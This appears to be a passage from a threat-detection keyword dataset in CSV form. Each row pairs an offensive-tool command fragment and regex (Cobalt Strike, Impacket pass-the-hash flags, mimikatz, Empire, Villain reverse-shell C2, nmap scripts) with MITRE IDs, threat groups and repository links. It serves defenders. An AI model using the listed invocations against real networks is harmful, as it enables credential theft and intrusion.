"* -hasbootstraphint *",".{0,1000}\s\-hasbootstraphint\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","1411"
"* -hashes * -spn * -impersonate *",".{0,1000}\s\-hashes\s.{0,1000}\s\-spn\s.{0,1000}\s\-impersonate\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1412"
"* -hashes lm:nt -gpo-id * -powershell *",".{0,1000}\s\-hashes\slm\:nt\s\-gpo\-id\s.{0,1000}\s\-powershell\s.{0,1000}","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","0","N/A","N/A","8","5","416","48","2024-02-18T19:23:57Z","2020-05-10T21:21:27Z","1413"
"* --hash-type * --attack-mode *",".{0,1000}\s\-\-hash\-type\s.{0,1000}\s\-\-attack\-mode\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1414"
"* hashview.py*",".{0,1000}\shashview\.py.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","1415"
"* hashview-agent *",".{0,1000}\shashview\-agent\s.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","1416"
"* havoc_bof.py*",".{0,1000}\shavoc_bof\.py.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","1417"
"* havoc-client*",".{0,1000}\shavoc\-client.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","1418"
"* hbase-master-info.nse*",".{0,1000}\shbase\-master\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1419"
"* hbase-region-info.nse*",".{0,1000}\shbase\-region\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1420"
"* hddtemp-info.nse*",".{0,1000}\shddtemp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1421"
"* HiddenDesktop.cna*",".{0,1000}\sHiddenDesktop\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","1422"
"* HijackDLL-Threads.dll*",".{0,1000}\sHijackDLL\-Threads\.dll.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","1423"
"* hiphp-cli.sh*",".{0,1000}\shiphp\-cli\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","1424"
"* hiphp-desktop.sh*",".{0,1000}\shiphp\-desktop\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","1425"
"* HiveDump.ps1*",".{0,1000}\sHiveDump\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","1426"
"* hnap-info.nse*",".{0,1000}\shnap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1427"
"* Ho, hey! I'm a DC :)*",".{0,1000}\sHo,\shey!\sI\'m\sa\sDC\s\:\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","https://www.virustotal.com/gui/file-analysis/YjU2NjE0YjBiOGNlMzNhZDVlYzRhYWFkMjJhNzQ4ZGQ6MTcyNDUyMDQ0Mw==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","1428"
"* --hoax-port *",".{0,1000}\s\-\-hoax\-port\s.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","1429"
"* hollow.x64.*",".{0,1000}\shollow\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/HOLLOW","1","0","N/A","N/A","10","10","280","60","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z","1430"
"* --host * --port * --executable *.exe --command *cmd.exe*",".{0,1000}\s\-\-host\s.{0,1000}\s\-\-port\s.{0,1000}\s\-\-executable\s.{0,1000}\.exe\s\-\-command\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1431"
"* HostEnum.ps1*",".{0,1000}\sHostEnum\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1434"
"* hostenum.py *",".{0,1000}\shostenum\.py\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","N/A","10","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","1435"
"* --host-file *.txt -u * --prompt --admin --no-banner*",".{0,1000}\s\-\-host\-file\s.{0,1000}\.txt\s\-u\s.{0,1000}\s\-\-prompt\s\-\-admin\s\-\-no\-banner.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","1436"
"* hostmap-bfk.nse*",".{0,1000}\shostmap\-bfk\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1437"
"* hostmap-crtsh.nse*",".{0,1000}\shostmap\-crtsh\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1438"
"* hostmap-robtex.nse*",".{0,1000}\shostmap\-robtex\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1439"
"* HostRecon.ps1*",".{0,1000}\sHostRecon\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","1441"
"* -Hosts * -TopPorts *",".{0,1000}\s\-Hosts\s.{0,1000}\s\-TopPorts\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-Portscan.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1442"
"* hping3 *",".{0,1000}\shping3\s.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","N/A","10","1533","341","2024-07-10T12:38:39Z","2012-06-13T17:41:54Z","1443"
"* http://localhost:8080 -o agent*",".{0,1000}\shttp\:\/\/localhost\:8080\s\-o\sagent.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","1444"
"* http_malleable*",".{0,1000}\shttp_malleable.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","1445"
"* --http-address 127.0.0.1:8181*",".{0,1000}\s\-\-http\-address\s127\.0\.0\.1\:8181.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","1446"
"* http-adobe-coldfusion-apsa1301.nse*",".{0,1000}\shttp\-adobe\-coldfusion\-apsa1301\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1447"
"* http-affiliate-id.nse*",".{0,1000}\shttp\-affiliate\-id\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1448"
"* http-apache-negotiation.nse*",".{0,1000}\shttp\-apache\-negotiation\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1449"
"* http-apache-server-status.nse*",".{0,1000}\shttp\-apache\-server\-status\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1450"
"* http-aspnet-debug.nse*",".{0,1000}\shttp\-aspnet\-debug\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1451"
